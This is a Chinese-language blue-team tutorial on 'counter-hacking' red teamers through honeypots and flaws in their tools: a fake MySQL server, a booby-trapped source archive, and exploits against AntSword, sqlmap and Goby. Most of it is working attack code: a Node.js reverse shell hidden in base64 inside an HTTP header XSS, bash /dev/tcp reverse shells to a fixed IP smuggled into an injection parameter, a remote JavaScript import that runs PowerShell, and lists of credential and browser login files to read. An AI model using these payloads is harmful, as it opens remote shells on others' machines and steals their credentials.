➢ 蓝队技能-溯源反制-蜜罐&安全工具

#溯源反制-蜜罐-伪装MYSQL

当红队小子对目标进行扫描时，发下存在MYSQL安全问题去利用，便会落入蓝队的陷阱

https://github.com/ev0A/Mysqlist

蓝队：

1、修改读取文件字典

如：

-CS配置文件

C:/Users/Administrator/.aggressor.prop

-微信号配置文件

E:/WeChatFiles/WeChat Files/All Users/config/config.data

-浏览器历史记录

C:/Users/Administrator/AppData/Local/Microsoft/Edge/User Data/Default/Login Data

2、交互式或字典式启动（python2版本运行）

c:\Python27\python.exe exp_dicc.py 3306

c:\Python27\python.exe exp_input.py 3306

 

红队：

采用MYSQL客户端连接后触发

 

 

#溯源反制-蜜罐-伪装源码泄漏

当红队小子对网站进行目录扫描时，发现一个源码包，恰好又会点代审，便会落入蓝队的陷阱前端页面推荐使用登录框，使得红队束手被迫目录扫描，zip包名称推荐source.zip[域名].zip等

https://github.com/wendell1224/ide-honeypot

蓝队：

1、制作蜜罐源代码及配置启动程序workspace.xml

源代码：存放一些正常的源代码程序文件

配置启动：https://github.com/no-one-sec/idea-project-fish-exploit

2、将网站选择性编辑迷惑

· view 目录下放index.html模板文件

· js/css/fonts/img 等目录则是放静态资源

· favicon.ico放在与main.go同级目录（也可以不需要）

· source目录则是jb小子要打开的目录，src下可以放一下没用的源码增加zip包体积诱惑攻击队

3、启动项目等待红队上钩

ide-honeypot.exe -h 0.0.0.0 -p 8080 -f www -c "calc"

 

红队：

开始扫描，找到源码，开始审计，GG

 

 

#溯源反制-Webshell工具-AntSword

蓝队通过修改被植入后门的代码实现获得蚁剑使用者的权限

复现环境：<= v2.0.7 版本蚁剑反制

蓝队：Linux Web

红队：Windows AntSword

原理：

<?php

header('HTTP/1.1 500 <img src=# onerror=alert(1)>');

上线：

Nodejs代码：

var net = require("net"), sh = require("child_process").exec("cmd.exe");

var client = new net.Socket();

client.connect(xx, "xx.xx.xx.xx", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});

编码组合后：

header("HTTP/1.1 500 Not <img src=# onerror='eval(new Buffer(`dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpLCBzaCA9IHJlcXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCJjbWQuZXhlIik7CnZhciBjbGllbnQgPSBuZXcgbmV0LlNvY2tldCgpOwpjbGllbnQuY29ubmVjdCgxMDA4NiwgIjQ3Ljk0LjIzNi4xMTciLCBmdW5jdGlvbigpe2NsaWVudC5waXBlKHNoLnN0ZGluKTtzaC5zdGRvdXQucGlwZShjbGllbnQpO3NoLnN0ZGVyci5waXBlKGNsaWVudCk7fSk7`,`base64`).toString())'>");

 

#溯源反制-SQL注入工具-SQLMAP

蓝队提前构造注入页面诱使红队进行SqlMap注入拿到红队机器权限

复现环境：

蓝队：Linux Web

红队：Linux sqlmap

原理：

命令管道符：ping "`dir`"

构造注入点页面固定注入参数值，等待攻击者进行注入

sqlmap -u "http://47.94.236.117/test.html?id=aaa&b=`dir`"

sqlmap -u "http://47.94.236.117/test.html?id=aaa&b=`exec /bin/sh 0</dev/tcp/47.94.236.117/2333 1>&0 2>&0`"

 

1、测试反弹编码：

bash -i >& /dev/tcp/47.94.236.117/2333 0>&1

YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzIzMzMgMD4mMQ==

echo YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzIzMzMgMD4mMQ== | base64 -d|bash -i

2、蓝队构造页面test.php注入页面固定参数值：

<html>

<head>

<meta charset="utf-8">

<title> A sqlmap honeypot demo</title>

</head>

<body>

<input>search the user</input> <!--创建一个空白表单-->

<form action="username.html" method="post" enctype="text/plain">

<!--创建一个隐藏的表单-->

<input type='hidden' name='name' value="xiaodi&id=45273434&query=shell`echo YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzIzMzMgMD4mMQ== | base64 -d|bash -i`&port=6379"/>

<!--创建一个按钮，提交表单内容-->

<input type="submit" value='提交'>

</form>

</body>

</html>

3、红队攻击者进行注入测试：

sqlmap -u "http://xx.xx.xx.xx/test.php" --data "name=xiaodi&id=45273434&query=shell`echo YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzIzMzMgMD4mMQ== | base64 -d|bash -i`&port=6379"

 

#溯源反制-漏洞扫描工具-Goby

蓝队在红队攻击目标端口上写一个文件，

红队利用goby去扫描分析时会触发反制得到机器权限

复现环境：

蓝队：Linux Web

红队：Windows10 Goby

RCE:

index.php

<?php

header("X-Powered-By: PHP/<img src=1 onerror=import(unescape('http%3A//47.94.236.117/1.js'))>");

?>

<head>

<title>TEST</title>

</head>

<body>

testtest

</body>

</html>

1.js

(function(){

require('child_process').exec('calc.exe');

})();

2.js上线：

(function(){

require('child_process').exec('powershell -nop -w hidden -encodedcommand JABXXXXXXXX......');

})();